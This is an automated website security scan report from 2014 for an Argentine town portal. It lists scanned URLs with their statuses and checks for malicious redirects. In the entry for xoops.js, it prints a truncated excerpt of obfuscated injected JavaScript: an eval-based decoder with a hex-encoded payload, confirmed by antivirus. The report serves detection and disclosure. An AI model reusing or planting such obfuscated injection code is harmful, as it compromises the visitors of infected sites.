Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=montemaiz.com.ar
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://montemaiz.com.ar/ | HTTP/1.1 302 Found Connection: close Date: Sun, 07 Sep 2014 05:44:30 GMT Location: http://www.montemaiznet.com.ar/php/ Server: Apache Content-Length: 5901 Content-Type: text/html X-Powered-By: PHP/5.3.28 | clean |
http://www.montemaiznet.com.ar/php/ | 200 OK Content-Length: 33713 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: montemaiz.com.ar ...[78 bytes skipped]... /www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es"> <head> <meta http-equiv="content-type" content="text/html; charset=UTF-8" /> <meta http-equiv="content-language" content="es" /> <meta name="robots" content="index,follow" /> <meta name="keywords" content="monte maiz, montemaiznet, procoop, agrometal, ingersoll,montemaiz.com.ar,montemaiz,montemaiz.com" /> <meta name="description" content="MonteMaizNet, el sitio de Monte Maíz en la Red" /> <meta name="rating" content="general" /> <meta name="author" content="Procoop" /> <meta name="copyright" content="Copyright © 2010" /> <meta name="generator" content="XOOPS" /> <title>MonteMaizNet - El sitio de Monte Maíz en la Red</title> <link href="http://www.montemaiznet.com.ar/php/favi ...[3939 bytes skipped]... | ||
http://www.montemaiznet.com.ar/php/include/xoops.js | 200 OK Content-Length: 18198 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) qsvty="y";zaqse="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)--(window[zaqse].getElementById("asd"))}()}catch(tkwapv){ahio=function(xsmawi){xsmawi="fro"+xsmawi;for(rcf=0;rcf<qsvty.length;rcf++){ehed+=String[xsmawi](ggf(igt+(qsvty[rcf]))-(11));}};};ggf=(window.eval);igt="0x";dpt=0;if(!dpt){try{++ggf(zaqse)["\x62o"+"d"+qsvty]}catch(tkwapv){ldign="^";}qsvty="2b^71^80^79^6e^7f^74^7a^79^2b^71^72^71^73^83^3b^44^33^34^2b^86^18^15^2b^81^6c^7d^2b^7e^7f^6c^7f^74^6e^48^32^6c^75^6c^83 Antivirus reports:
| ||
http://www.montemaiznet.com.ar/php/class/textsanitizer/image/image.js | 200 OK Content-Length: 902 Content-Type: application/javascript | clean |
http://www.infobae.com/adjuntos/noticias/0000006.js | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=604800 Connection: close Date: Sun, 07 Sep 2014 05:44:35 GMT Location: http://www.infobae.com/ Server: nginx Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 20 Content-Type: text/html; charset=iso-8859-1 Cache: MISS1 XLocation: Error2 | clean |
http://www.infobae.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 07 Sep 2014 05:44:36 GMT Location: /america Server: AkamaiGHost Content-Length: 0 | clean |
http://www.infobae.com/america | 200 OK Content-Length: 202654 Content-Type: text/html | clean |
http://b.scorecardresearch.com/c2/8030908/ct.js | 200 OK Content-Length: 1886 Content-Type: application/x-javascript | clean |
http://www.infobae.com//js/mootools-core-1.4.0.js?v-1405370019/ | 200 OK Content-Length: 154717 Content-Type: application/x-javascript | clean |
http://www.infobae.com//js/cms.tools.js?v-1405370019/ | 200 OK Content-Length: 12607 Content-Type: application/x-javascript | clean |
http://www.infobae.com//js/fbinit.js?v-1405370019/ | 200 OK Content-Length: 273 Content-Type: application/x-javascript | clean |
http://www.infobae.com//td/modulos/usuariosweb/js/fbconnect.js?v-1405370002/ | 200 OK Content-Length: 1362 Content-Type: application/x-javascript | clean |
http://www.infobae.com//td/modulos/usuariosweb/js/twconnect.js?v-1405370002/ | 200 OK Content-Length: 855 Content-Type: application/x-javascript | clean |
http://www.infobae.com//td/modulos/usuariosweb/js/gpconnect.js?v-1405370002/ | 200 OK Content-Length: 851 Content-Type: application/x-javascript | clean |
http://www.infobae.com//td/modulos/usuariosweb/js/usuariosweb.js?v-1405370002/ | 200 OK Content-Length: 14132 Content-Type: application/x-javascript | clean |
http://www.infobae.com//libs/mootools-more/Base64.js?v-1405370018/ | 200 OK Content-Length: 3433 Content-Type: application/x-javascript | clean |
http://www.infobae.com/js/infobae/usuariosweb.js?v-1405370019 | 200 OK Content-Length: 13886 Content-Type: application/x-javascript | clean |
http://www.infobae.com/js/infobae/twconnect.js?v-1405370019 | 200 OK Content-Length: 437 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: montemaiz.com.ar
Result:
HTTP/1.1 302 Found
Connection: close
Date: Sun, 07 Sep 2014 05:44:30 GMT
Location: http://www.montemaiznet.com.ar/php/
Server: Apache
Content-Length: 5901
Content-Type: text/html
X-Powered-By: PHP/5.3.28
...5901 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: montemaiz.com.ar
Referer: http://www.google.com/search?q=montemaiz.com.ar
Result:
The result is similar to the first query. There are no suspicious redirects found.